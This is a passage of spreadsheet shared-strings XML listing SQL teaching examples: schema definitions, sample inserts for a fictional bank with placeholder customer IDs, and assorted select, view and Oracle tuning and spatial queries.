    <t xml:space="preserve">create table individual  ( cust_id integer unsigned not null, fname varchar ( 30 )  not null, lname varchar ( 30 )  not null, birth_date date, constraint fk_i_cust_id foreign key  ( cust_id )  references customer  ( cust_id ) , constraint pk_individual primary key  ( cust_id )   ) </t>
  </si>
  <si>
    <t xml:space="preserve">create table officer  ( officer_id smallint unsigned not null auto_increment, cust_id integer unsigned not null, fname varchar ( 30 )  not null, lname varchar ( 30 )  not null, title varchar ( 20 ) , start_date date not null, end_date date, constraint fk_o_cust_id foreign key  ( cust_id )  references business  ( cust_id ) , constraint pk_officer primary key  ( officer_id )   ) </t>
  </si>
  <si>
    <t xml:space="preserve">create table product  ( product_cd varchar ( 10 )  not null, name varchar ( 50 )  not null, product_type_cd varchar ( 10 )  not null, date_offered date, date_retired date, constraint fk_product_type_cd foreign key  ( product_type_cd )  references product_type  ( product_type_cd ) , constraint pk_product primary key  ( product_cd )   ) </t>
  </si>
  <si>
    <t xml:space="preserve">create table product_type  ( product_type_cd varchar ( 10 )  not null, name varchar ( 50 )  not null, constraint pk_product_type primary key  ( product_type_cd )   ) </t>
  </si>
  <si>
    <t xml:space="preserve">create table transaction  ( txn_id integer unsigned not null auto_increment, txn_date datetime not null, account_id integer unsigned not null, txn_type_cd enum ( 'DBT','CDT' ) , amount double ( 10,2 )  not null, teller_emp_id smallint unsigned, execution_branch_id smallint unsigned, funds_avail_date datetime, constraint fk_t_account_id foreign key  ( account_id )  references account  ( account_id ) , constraint fk_teller_emp_id foreign key  ( teller_emp_id )  references employee  ( emp_id ) , constraint fk_exec_branch_id foreign key  ( execution_branch_id )  references branch  ( branch_id ) , constraint pk_transaction primary key  ( txn_id )   ) </t>
  </si>
  <si>
    <t xml:space="preserve">create tablespace sh_indexes datafile 'shidx.f' size 2m reuse autoextend on default storage  ( initial 2k next 2k pctincrease 0 maxextents unlimited ) </t>
  </si>
  <si>
    <t xml:space="preserve">create tablespace sh_mviews datafile 'shmv.f' size 2m reuse autoextend on default storage  ( initial 2k next 2k pctincrease 0 maxextents unlimited ) </t>
  </si>
  <si>
    <t>create temporary table emp_tmp as select emp_id, fname, lname from employee</t>
  </si>
  <si>
    <t>create view view_sections as select s.id, c.title, f.name, s.year, count ( e.id )  from sections s, courses c, faculty f, enrollment e where s.course_id  =  c.id and s.instructor_id  =  f.id and s.id  =  e.section_id group by s.id, c.title, f.name, s.year</t>
  </si>
  <si>
    <t xml:space="preserve">dbCourse : =  select C.cID, C.cTitle, C.cHours from trainingCourse C where exists  ( select * from technologyArea A where A.aID  =  C.areaID and A.aTitle  =  'Database' ) </t>
  </si>
  <si>
    <t xml:space="preserve">dbEmployee : =  select E.eID, E.eLast, E.eFirst, E.eTitle from employee E where exists  ( select * from takes T, dbCourse D where T.eID = E.eID and T.cID = D.cID ) </t>
  </si>
  <si>
    <t xml:space="preserve">dbms_sqltune.create_sqlset ( sqlsetname, 'Test loading from cursor cache' ) </t>
  </si>
  <si>
    <t xml:space="preserve">dbms_sqltune.load_sqlset ( sqlsetname, sqlsetcur ) </t>
  </si>
  <si>
    <t xml:space="preserve">declare sql_stmt varchar2 ( 1000 ) </t>
  </si>
  <si>
    <t xml:space="preserve">delete from enrollment where section_id  =   ( select s.id from sections s, courses c where s.year  =  2001 and s.course_id  =  c.id and c.title  =  'Elocution' ) </t>
  </si>
  <si>
    <t>drop table emp_tmp</t>
  </si>
  <si>
    <t>drop view view_sections</t>
  </si>
  <si>
    <t>end</t>
  </si>
  <si>
    <t>execute immediate sql_stmt</t>
  </si>
  <si>
    <t>g1 ( eTitle, minSalary, maxSalary, avgSalary )  : =  select E.eTitle, min ( E.eSalary ) , max ( E.eSalary ) , avg ( E.eSalary )  from employee E group by E.eTitle</t>
  </si>
  <si>
    <t>g2 : =  select A.aID, A.aTitle, count ( distinct T.eID )  as numEmps from technologyArea A, trainingCourse C, takes T where A.aID  =  C.areaID and C.cID  =  T.cID group by A.aID, A.aTitle</t>
  </si>
  <si>
    <t>grant ADMINISTER SQL TUNING SET to sh</t>
  </si>
  <si>
    <t>grant ADVISOR to sh</t>
  </si>
  <si>
    <t>h1 : =  select A.aID, A.aTitle, count ( distinct T.eID )  as numEmps from technologyArea A, trainingCourse C, takes T where A.aID  =  C.areaID and C.cID  =  T.cID group by A.aID, A.aTitle having numEmps &gt; =  4 order by numEmps desc</t>
  </si>
  <si>
    <t>h2 : =  select * from numEmpsTakenArea where numEmps &gt; =  4 order by numEmps desc</t>
  </si>
  <si>
    <t>insert into Company values ( 'MuseumPass', 'Vatican' ) ;</t>
  </si>
  <si>
    <t>insert into Purchase values ( 12, 'gadget', NULL, NULL, 'april' ) ;</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</si>
  <si>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'CHK' prod_cd, '2002-11-23' open_date, '2004-11-30' last_date, 1057.75 avail, 1057.75 pend union all select 'MM' prod_cd, '2002-12-15' open_date, '2004-12-05' last_date, 2212.50 avail, 2212.50 pend )  a where c.fed_id  =  '333-33-3333'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</si>
  <si>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'SBL' prod_cd, '2004-02-22' open_date, '2004-12-17' last_date, 50000.00 avail, 50000.00 pend )  a where c.fed_id  =  '04-4444444'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</si>
  <si>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'2001-05-23' open_date, '2005-01-03' last_date, 3487.19 avail, 3487.19 pend union all select 'SAV' prod_cd, '2001-05-23' open_date, '2004-10-12' last_date, 387.99 avail, 387.99 pend )  a where c.fed_id  =  '888-88-8888'</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</si>
  <si>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'2002-09-30' open_date, '2004-12-15' last_date, 23575.12 avail, 23575.12 pend union all select 'BUS' prod_cd, '2002-10-01' open_date, '2004-08-28' last_date, 0 avail, 0 pend )  a where c.fed_id  =  '04-1111111'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</si>
  <si>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'2003-07-30' open_date, '2004-12-15' last_date, 38552.05 avail, 38552.05 pend )  a where c.fed_id  =  '04-3333333'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</si>
  <si>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'2004-01-27' open_date, '2005-01-05' last_date, 2237.97 avail, 2897.97 pend )  a where c.fed_id  =  '555-55-5555'</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</si>
  <si>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'2002-08-24' open_date, '2004-11-29' last_date, 122.37 avail, 122.37 pend union all select 'CD' prod_cd, '2004-12-28' open_date, '2004-12-28' last_date, 10000.00 avail, 10000.00 pend )  a where c.fed_id  =  '666-66-6666'</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</si>
  <si>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'2003-07-30' open_date, '2004-12-15' last_date, 125.67 avail, 125.67 pend union all select 'MM' prod_cd, '2004-10-28' open_date, '2004-10-28' last_date, 9345.55 avail, 9845.55 pend union all select 'CD' prod_cd, '2004-06-30' open_date, '2004-06-30' last_date, 1500.00 avail, 1500.00 pend )  a where c.fed_id  =  '999-99-9999'</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</si>
  <si>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'2003-09-12' open_date, '2005-01-03' last_date, 534.12 avail, 534.12 pend union all select 'SAV' prod_cd, '2000-01-15' open_date, '2004-10-24' last_date, 767.77 avail, 767.77 pend union all select 'MM' prod_cd, '2004-09-30' open_date, '2004-11-11' last_date, 5487.09 avail, 5487.09 pend )  a where c.fed_id  =  '444-44-4444'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</si>
  <si>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'BUS' prod_cd, '2004-03-22' open_date, '2004-11-14' last_date, 9345.55 avail, 9345.55 pend )  a where c.fed_id  =  '04-2222222'</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</si>
  <si>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'CD' prod_cd, '2004-01-12' open_date, '2004-01-12' last_date, 5000.00 avail, 5000.00 pend )  a where c.fed_id  =  '777-77-7777'</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</si>
  <si>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'2000-01-15' open_date, '2005-01-04' last_date, 1057.75 avail, 1057.75 pend union all select 'SAV' prod_cd, '2000-01-15' open_date, '2004-12-19' last_date, 500.00 avail, 500.00 pend union all select 'CD' prod_cd, '2004-06-30' open_date, '2004-06-30' last_date, 3000.00 avail, 3000.00 pend )  a where c.fed_id  =  '111-11-1111'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</si>
  <si>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'2001-03-12' open_date, '2004-12-27' last_date, 2258.02 avail, 2258.02 pend union all select 'SAV' prod_cd, '2001-03-12' open_date, '2004-12-11' last_date, 200.00 avail, 200.00 pend )  a where c.fed_id  =  '222-22-2222'</t>
  </si>
  <si>
    <t xml:space="preserve">insert into branch  ( branch_id, name, address, city, state, zip )  values  ( null, 'Headquarters', '3882 Main St.', 'Waltham', 'MA', '02451' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into branch  ( branch_id, name, address, city, state, zip )  values  ( null, 'Quincy Branch', '125 Presidential Way', 'Quincy', 'MA', '02169' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into branch  ( branch_id, name, address, city, state, zip )  values  ( null, 'So. NH Branch', '378 Maynard Ln.', 'Salem', 'NH', '03079' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into branch  ( branch_id, name, address, city, state, zip )  values  ( null, 'Woburn Branch', '422 Maple St.', 'Woburn', 'MA', '01801' ) </t>
  </si>
  <si>
    <t>insert into business  ( cust_id, name, state_id, incorp_date )  select cust_id, 'AAA Insurance Inc.', '45-678-901', '1999-05-01' from customer where fed_id  =  '04-4444444'</t>
  </si>
  <si>
    <t>insert into business  ( cust_id, name, state_id, incorp_date )  select cust_id, 'Chilton Engineering', '12-345-678', '1995-05-01' from customer where fed_id  =  '04-1111111'</t>
  </si>
  <si>
    <t>insert into business  ( cust_id, name, state_id, incorp_date )  select cust_id, 'Northeast Cooling Inc.', '23-456-789', '2001-01-01' from customer where fed_id  =  '04-2222222'</t>
  </si>
  <si>
    <t>insert into business  ( cust_id, name, state_id, incorp_date )  select cust_id, 'Superior Auto Body', '34-567-890', '2002-06-30' from customer where fed_id  =  '04-3333333'</t>
  </si>
  <si>
    <t>insert into company values  ( 'Canon', 'Japan' ) ;</t>
  </si>
  <si>
    <t>insert into company values  ( 'GizmoWorks', 'USA' ) ;</t>
  </si>
  <si>
    <t>insert into company values  ( 'Hitachi', 'Japan' ) ;</t>
  </si>
  <si>
    <t xml:space="preserve">insert into customer  ( cust_id, fed_id, cust_type_cd, address, city, state, postal_code )  values  ( null, '04-1111111', 'B', '7 Industrial Way', 'Salem', 'NH', '03079' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into customer  ( cust_id, fed_id, cust_type_cd, address, city, state, postal_code )  values  ( null, '04-2222222', 'B', '287A Corporate Ave', 'Wilmington', 'MA', '01887' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into customer  ( cust_id, fed_id, cust_type_cd, address, city, state, postal_code )  values  ( null, '04-3333333', 'B', '789 Main St', 'Salem', 'NH', '03079' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into customer  ( cust_id, fed_id, cust_type_cd, address, city, state, postal_code )  values  ( null, '04-4444444', 'B', '4772 Presidential Way', 'Quincy', 'MA', '02169' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into customer  ( cust_id, fed_id, cust_type_cd, address, city, state, postal_code )  values  ( null, '111-11-1111', 'I', '47 Mockingbird Ln', 'Lynnfield', 'MA', '01940' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into customer  ( cust_id, fed_id, cust_type_cd, address, city, state, postal_code )  values  ( null, '222-22-2222', 'I', '372 Clearwater Blvd', 'Woburn', 'MA', '01801' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into customer  ( cust_id, fed_id, cust_type_cd, address, city, state, postal_code )  values  ( null, '333-33-3333', 'I', '18 Jessup Rd', 'Quincy', 'MA', '02169' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into customer  ( cust_id, fed_id, cust_type_cd, address, city, state, postal_code )  values  ( null, '444-44-4444', 'I', '12 Buchanan Ln', 'Waltham', 'MA', '02451' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into customer  ( cust_id, fed_id, cust_type_cd, address, city, state, postal_code )  values  ( null, '555-55-5555', 'I', '2341 Main St', 'Salem', 'NH', '03079' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into customer  ( cust_id, fed_id, cust_type_cd, address, city, state, postal_code )  values  ( null, '666-66-6666', 'I', '12 Blaylock Ln', 'Waltham', 'MA', '02451' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into customer  ( cust_id, fed_id, cust_type_cd, address, city, state, postal_code )  values  ( null, '777-77-7777', 'I', '29 Admiral Ln', 'Wilmington', 'MA', '01887' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into customer  ( cust_id, fed_id, cust_type_cd, address, city, state, postal_code )  values  ( null, '888-88-8888', 'I', '472 Freedom Rd', 'Salem', 'NH', '03079' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into customer  ( cust_id, fed_id, cust_type_cd, address, city, state, postal_code )  values  ( null, '999-99-9999', 'I', '29 Maple St', 'Newton', 'MA', '02458' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into department  ( dept_id, name )  values  ( null, 'Administration' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into department  ( dept_id, name )  values  ( null, 'Loans' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into department  ( dept_id, name )  values  ( null, 'Operations' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into employee  ( emp_id, fname, lname, start_date, dept_id, title, assigned_branch_id )  values  ( null, 'Beth', 'Fowler', '2002-06-29',  ( select dept_id from department where name  =  'Operations' ) , 'Teller',  ( select branch_id from branch where name  =  'So. NH Branch'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">insert into employee  ( emp_id, fname, lname, start_date, dept_id, title, assigned_branch_id )  values  ( null, 'Chris', 'Tucker', '2004-09-15',  ( select dept_id from department where name  =  'Operations' ) , 'Teller',  ( select branch_id from branch where name  =  'Headquarters'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">insert into employee  ( emp_id, fname, lname, start_date, dept_id, title, assigned_branch_id )  values  ( null, 'Cindy', 'Mason', '2002-08-09',  ( select dept_id from department where name  =  'Operations' ) , 'Teller',  ( select branch_id from branch where name  =  'Quincy Branch'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">insert into employee  ( emp_id, fname, lname, start_date, dept_id, title, assigned_branch_id )  values  ( null, 'Frank', 'Portman', '2003-04-01',  ( select dept_id from department where name  =  'Operations' ) , 'Teller',  ( select branch_id from branch where name  =  'Quincy Branch'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">insert into employee  ( emp_id, fname, lname, start_date, dept_id, title, assigned_branch_id )  values  ( null, 'Helen', 'Fleming', '2004-03-17',  ( select dept_id from department where name  =  'Operations' ) , 'Head Teller',  ( select branch_id from branch where name  =  'Headquarters'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">insert into employee  ( emp_id, fname, lname, start_date, dept_id, title, assigned_branch_id )  values  ( null, 'Jane', 'Grossman', '2002-05-03',  ( select dept_id from department where name  =  'Operations' ) , 'Teller',  ( select branch_id from branch where name  =  'Headquarters'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">insert into employee  ( emp_id, fname, lname, start_date, dept_id, title, assigned_branch_id )  values  ( null, 'John', 'Blake', '2000-05-11',  ( select dept_id from department where name  =  'Operations' ) , 'Head Teller',  ( select branch_id from branch where name  =  'Quincy Branch'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">insert into employee  ( emp_id, fname, lname, start_date, dept_id, title, assigned_branch_id )  values  ( null, 'John', 'Gooding', '2003-11-14',  ( select dept_id from department where name  =  'Loans' ) , 'Loan Manager',  ( select branch_id from branch where name  =  'Headquarters'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">insert into employee  ( emp_id, fname, lname, start_date, dept_id, title, assigned_branch_id )  values  ( null, 'Michael', 'Smith', '2001-06-22',  ( select dept_id from department where name  =  'Administration' ) , 'President',  ( select branch_id from branch where name  =  'Headquarters'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">insert into employee  ( emp_id, fname, lname, start_date, dept_id, title, assigned_branch_id )  values  ( null, 'Paula', 'Roberts', '2002-07-27',  ( select dept_id from department where name  =  'Operations' ) , 'Head Teller',  ( select branch_id from branch where name  =  'Woburn Branch'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">insert into employee  ( emp_id, fname, lname, start_date, dept_id, title, assigned_branch_id )  values  ( null, 'Rick', 'Tulman', '2002-12-12',  ( select dept_id from department where name  =  'Operations' ) , 'Teller',  ( select branch_id from branch where name  =  'So. NH Branch'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">insert into employee  ( emp_id, fname, lname, start_date, dept_id, title, assigned_branch_id )  values  ( null, 'Robert', 'Tyler', '2000-02-09',  ( select dept_id from department where name  =  'Administration' ) , 'Treasurer',  ( select branch_id from branch where name  =  'Headquarters'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">insert into employee  ( emp_id, fname, lname, start_date, dept_id, title, assigned_branch_id )  values  ( null, 'Samantha', 'Jameson', '2003-01-08',  ( select dept_id from department where name  =  'Operations' ) , 'Teller',  ( select branch_id from branch where name  =  'Woburn Branch'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">insert into employee  ( emp_id, fname, lname, start_date, dept_id, title, assigned_branch_id )  values  ( null, 'Sarah', 'Parker', '2002-12-02',  ( select dept_id from department where name  =  'Operations' ) , 'Teller',  ( select branch_id from branch where name  =  'Headquarters'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">insert into employee  ( emp_id, fname, lname, start_date, dept_id, title, assigned_branch_id )  values  ( null, 'Susan', 'Barker', '2002-09-12',  ( select dept_id from department where name  =  'Administration' ) , 'Vice President',  ( select branch_id from branch where name  =  'Headquarters'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">insert into employee  ( emp_id, fname, lname, start_date, dept_id, title, assigned_branch_id )  values  ( null, 'Susan', 'Hawthorne', '2002-04-24',  ( select dept_id from department where name  =  'Operations' ) , 'Operations Manager',  ( select branch_id from branch where name  =  'Headquarters'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">insert into employee  ( emp_id, fname, lname, start_date, dept_id, title, assigned_branch_id )  values  ( null, 'Theresa', 'Markham', '2001-03-15',  ( select dept_id from department where name  =  'Operations' ) , 'Head Teller',  ( select branch_id from branch where name  =  'So. NH Branch'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">insert into employee  ( emp_id, fname, lname, start_date, dept_id, title, assigned_branch_id )  values  ( null, 'Thomas', 'Ziegler', '2000-10-23',  ( select dept_id from department where name  =  'Operations' ) , 'Teller',  ( select branch_id from branch where name  =  'Woburn Branch'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">insert into faculty values  ( 6, 'Tom', 30 ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into faculty values  ( 7, 'Jack', 30 ) </t>
  </si>
  <si>
    <t>insert into individual  ( cust_id, fname, lname, birth_date )  select cust_id, 'Charles', 'Frasier', '1971-08-25' from customer where fed_id  =  '555-55-5555'</t>
  </si>
  <si>
    <t>insert into individual  ( cust_id, fname, lname, birth_date )  select cust_id, 'Frank', 'Tucker', '1958-02-06' from customer where fed_id  =  '333-33-3333'</t>
  </si>
  <si>
    <t>insert into individual  ( cust_id, fname, lname, birth_date )  select cust_id, 'James', 'Hadley', '1972-04-22' from customer where fed_id  =  '111-11-1111'</t>
  </si>
  <si>
    <t>insert into individual  ( cust_id, fname, lname, birth_date )  select cust_id, 'John', 'Hayward', '1966-12-22' from customer where fed_id  =  '444-44-4444'</t>
  </si>
  <si>
    <t>insert into individual  ( cust_id, fname, lname, birth_date )  select cust_id, 'John', 'Spencer', '1962-09-14' from customer where fed_id  =  '666-66-6666'</t>
  </si>
  <si>
    <t>insert into individual  ( cust_id, fname, lname, birth_date )  select cust_id, 'Louis', 'Blake', '1977-07-01' from customer where fed_id  =  '888-88-8888'</t>
  </si>
  <si>
    <t>insert into individual  ( cust_id, fname, lname, birth_date )  select cust_id, 'Margaret', 'Young', '1947-03-19' from customer where fed_id  =  '777-77-7777'</t>
  </si>
  <si>
    <t>insert into individual  ( cust_id, fname, lname, birth_date )  select cust_id, 'Richard', 'Farley', '1968-06-16' from customer where fed_id  =  '999-99-9999'</t>
  </si>
  <si>
    <t>insert into individual  ( cust_id, fname, lname, birth_date )  select cust_id, 'Susan', 'Tingley', '1968-08-15' from customer where fed_id  =  '222-22-2222'</t>
  </si>
  <si>
    <t>insert into officer  ( officer_id, cust_id, fname, lname, title, start_date )  select null, cust_id, 'Carl', 'Lutz', 'President', '2002-06-30' from customer where fed_id  =  '04-3333333'</t>
  </si>
  <si>
    <t>insert into officer  ( officer_id, cust_id, fname, lname, title, start_date )  select null, cust_id, 'John', 'Chilton', 'President', '1995-05-01' from customer where fed_id  =  '04-1111111'</t>
  </si>
  <si>
    <t>insert into officer  ( officer_id, cust_id, fname, lname, title, start_date )  select null, cust_id, 'Paul', 'Hardy', 'President', '2001-01-01' from customer where fed_id  =  '04-2222222'</t>
  </si>
  <si>
    <t>insert into officer  ( officer_id, cust_id, fname, lname, title, start_date )  select null, cust_id, 'Stanley', 'Cheswick', 'President', '1999-05-01' from customer where fed_id  =  '04-4444444'</t>
  </si>
  <si>
    <t xml:space="preserve">insert into product  ( product_cd, name, product_type_cd, date_offered )  values  ( 'AUT','auto loan','LOAN','2000-01-01' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into product  ( product_cd, name, product_type_cd, date_offered )  values  ( 'BUS','business line of credit','LOAN','2000-01-01' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into product  ( product_cd, name, product_type_cd, date_offered )  values  ( 'CD','certificate of deposit','ACCOUNT','2000-01-01' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into product  ( product_cd, name, product_type_cd, date_offered )  values  ( 'CHK','checking account','ACCOUNT','2000-01-01' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into product  ( product_cd, name, product_type_cd, date_offered )  values  ( 'MM','money market account','ACCOUNT','2000-01-01' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into product  ( product_cd, name, product_type_cd, date_offered )  values  ( 'MRT','home mortgage','LOAN','2000-01-01' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into product  ( product_cd, name, product_type_cd, date_offered )  values  ( 'SAV','savings account','ACCOUNT','2000-01-01' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into product  ( product_cd, name, product_type_cd, date_offered )  values  ( 'SBL','small business loan','LOAN','2000-01-01' ) </t>
  </si>
  <si>
    <t>insert into product values  ( 'Gizmo', '$19.99', 'Gadgets', 'GizmoWorks' ) ;</t>
  </si>
  <si>
    <t>insert into product values  ( 'MultiTouch', '$203.99', 'Household', 'Hitachi' ) ;</t>
  </si>
  <si>
    <t>insert into product values  ( 'Powergizmo', '$29.99', 'Gadgets', 'GizmoWorks' ) ;</t>
  </si>
  <si>
    <t>insert into product values  ( 'SingleTouch', '$149.99', 'Photography', 'Canon' ) ;</t>
  </si>
  <si>
    <t>insert into product values ( 1, 'bagel', 'Sunshine Co.' ) ;</t>
  </si>
  <si>
    <t>insert into product values ( 2, 'banana', 'BusyHands' ) ;</t>
  </si>
  <si>
    <t>insert into product values ( 3, 'gizmo', 'GizmoWorks' ) ;</t>
  </si>
  <si>
    <t>insert into product values ( 4, 'gadget', 'BusyHands' ) ;</t>
  </si>
  <si>
    <t>insert into product values ( 5, 'powerGizmo', 'PowerWorks' ) ;</t>
  </si>
  <si>
    <t xml:space="preserve">insert into product_type  ( product_type_cd, name )  values  ( 'ACCOUNT','Customer Accounts' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into product_type  ( product_type_cd, name )  values  ( 'INSURANCE','Insurance Offerings' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into product_type  ( product_type_cd, name )  values  ( 'LOAN','Individual and Business Loans' ) </t>
  </si>
  <si>
    <t xml:space="preserve">insert into transaction  ( txn_id, txn_date, account_id, txn_type_cd, amount, funds_avail_date )  select null, a.open_date, a.account_id, 'CDT', 100, a.open_date from account a where a.product_cd IN  ( 'CHK','SAV','CD','MM' ) </t>
  </si>
  <si>
    <t xml:space="preserve">leads : =  select E.eID from employee E where exists  ( select * from technologyArea A where A.aLeadID = E.eID ) </t>
  </si>
  <si>
    <t>leadsA ( eID )  : =  select aLeadID from technologyArea</t>
  </si>
  <si>
    <t>moreThanOneTechArea : =  select T.eID, count ( distinct areaID )  as numAreas from takes T, trainingCourse C where T.cID  =  C.cID group by T.eID having numAreas &gt; 1</t>
  </si>
  <si>
    <t>numEmpsTakenArea : =  select * from g2</t>
  </si>
  <si>
    <t>o1 : =  select E.eLast, E.eTitle, E.eSalary from employee E order by E.eLast</t>
  </si>
  <si>
    <t>refid NUMBER</t>
  </si>
  <si>
    <t>rollback</t>
  </si>
  <si>
    <t>select  ( round ( avg ( total/bocche ) , 2  )  )  , trade from catasto where series  =  1 and total &lt;&gt; 0 and sex  =  1 group by trade</t>
  </si>
  <si>
    <t>select  ( select * from cl_sched union select * from cl_sched )  from department</t>
  </si>
  <si>
    <t>select * from catasto where family_name  =  “MACHIAVELL”</t>
  </si>
  <si>
    <t>select * from employee E where E.eSalary &gt; 100000</t>
  </si>
  <si>
    <t>select * from employee E, technologyArea A where E.eID = A.aLeadID</t>
  </si>
  <si>
    <t>select * from employee where dno = 5 and  ( salary between 30000 and 40000 ) ;</t>
  </si>
  <si>
    <t>select * from purchase;</t>
  </si>
  <si>
    <t>select * from students where extract (  month from graduation_date  )   =  6</t>
  </si>
  <si>
    <t>select * from students where graduation_date &lt; current_date and graduation_date &gt; current_date - interval '6 months'</t>
  </si>
  <si>
    <t xml:space="preserve">select * from students where graduation_date  =   ( select min ( graduation_date )  from students ) </t>
  </si>
  <si>
    <t>select C.cID, C.cTitle, C.cHours from  ( trainingCourse C join technologyArea A on areaID  =  aID )  where A.aTitle  =  'Database'</t>
  </si>
  <si>
    <t xml:space="preserve">select C.cID, C.cTitle, C.cHours from trainingCourse C where C.areaID  =   ( select A.aID from technologyArea A where A.aTitle  =  'Database' ) </t>
  </si>
  <si>
    <t>select C.cID, C.cTitle, C.cHours from trainingCourse C, technologyArea A where C.areaID  =  A.aID and A.aTitle  =  'Database'</t>
  </si>
  <si>
    <t xml:space="preserve">select E.eID from employee E where E.eTitle = 'Manager' and exists  ( select * from takes T where T.eID = E.eID ) </t>
  </si>
  <si>
    <t xml:space="preserve">select E.eID from employee E where E.eTitle = 'Manager' and not exists  ( select * from takes T where T.eID = E.eID ) </t>
  </si>
  <si>
    <t>select E.eID from employee E where E.eTitle = 'Manager' except select T.eID from takes T</t>
  </si>
  <si>
    <t>select E.eID from employee E where E.eTitle = 'Manager' intersect select T.eID from takes T</t>
  </si>
  <si>
    <t>select E.eID from employee E where E.eTitle = 'Manager' or E.eTitle = 'Coach'</t>
  </si>
  <si>
    <t>select E.eID from employee E where E.eTitle = 'Manager' union select E.eID from employee E where E.eTitle = 'Coach'</t>
  </si>
  <si>
    <t xml:space="preserve">select E.eID from employee E where not exists  ( select * from leads L where L.eID = E.eID ) </t>
  </si>
  <si>
    <t>select E.eID, C.cID from employee E, trainingCourse C</t>
  </si>
  <si>
    <t xml:space="preserve">select E.eID, E.eLast, E.eFirst, E.eTitle from employee E where E.eID in  ( select T.eID from takes T, dbCourse D where T.cID = D.cID ) </t>
  </si>
  <si>
    <t xml:space="preserve">select E.eID, E.eLast, E.eFirst, E.eTitle from employee E where E.eID not in  ( select T.eID from takes T ) </t>
  </si>
  <si>
    <t xml:space="preserve">select E.eID, E.eLast, E.eFirst, E.eTitle from employee E where exists  ( select * from dbEmployee B where B.eID = E.eID )  and not exists  ( select * from dbCourse D where not exists  ( select * from takes T where T.eID = E.eID and T.cID = D.cID  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">select E.eID, E.eLast, E.eFirst, E.eTitle from employee E where exists  ( select * from moreThanOneTechArea M where M.eID  =  E.eID ) </t>
  </si>
  <si>
    <t xml:space="preserve">select E.eID, E.eLast, E.eFirst, E.eTitle from employee E where exists  ( select * from takes T1, takes T2, trainingCourse C1, trainingCourse C2 where T1.eID = E.eID and T2.eID = E.eID and T1.cID = C1.cID and T2.cID = C2.cID and C1.areaID &lt;&gt; C2.areaID ) </t>
  </si>
  <si>
    <t xml:space="preserve">select E.eID, E.eLast, E.eFirst, E.eTitle from employee E where not exists  ( select * from employee S where S.eSalary &lt; E.eSalary ) </t>
  </si>
  <si>
    <t xml:space="preserve">select E.eID, E.eLast, E.eFirst, E.eTitle from employee E where not exists  ( select * from takes T where T.eID = E.eID ) </t>
  </si>
  <si>
    <t>select E.eID, E.eLast, E.eFirst, E.eTitle, E.eSalary from employee E, q5Ai Q where E.eSalary  =  Q.minSalary</t>
  </si>
  <si>
    <t>select IDS.NAME, PROJECTS.NAME from IDS INNER JOIN IDPROJ ON IDS.EID  =  IDPROJ.EID INNER JOIN PROJECTS ON IDPROJ.PID  =  PROJECTS.PID ORDER BY IDS.NAME;</t>
  </si>
  <si>
    <t>select all salary from employee;</t>
  </si>
  <si>
    <t>select avg ( price )  from purchase;</t>
  </si>
  <si>
    <t>select avg ( total ) , sex from catasto where series  =  1 and sex &lt;&gt; 0 and total &lt;&gt; 0 group by sex</t>
  </si>
  <si>
    <t>select bdate,address from employee where fname = 'John' and minit = 'B' and lname = 'Smith';</t>
  </si>
  <si>
    <t>select c.* from courses c left join sections s on c.id  =  s.course_id where s.id is null</t>
  </si>
  <si>
    <t>select c.city from geod_interstates i, geod_cities c where highway  =  'I10/I5' and mdsys.sdo_within_distance  ( c.location, i.geom, 'distance = 100 unit = mile' )   =  'TRUE'</t>
  </si>
  <si>
    <t>select c.city, c.pop90 from geod_cities c where mdsys.sdo_relate (  c.location, mdsys.sdo_geometry  ( 2003, 8307, null, mdsys.sdo_elem_info_array  ( 1,1003,3 ) , mdsys.sdo_ordinate_array  ( -109, 37, -102, 40  )  )  , 'mask = INSIDE’ )   =  'TRUE'</t>
  </si>
  <si>
    <t>select c.county, mdsys.sdo_geom.relate  ( s.geom,'DETERMINE', c.geom, 0.5 )  "relation" from geod_states s, geod_counties c where s.state  =  'New Hampshire' and s.state  =  c.state</t>
  </si>
  <si>
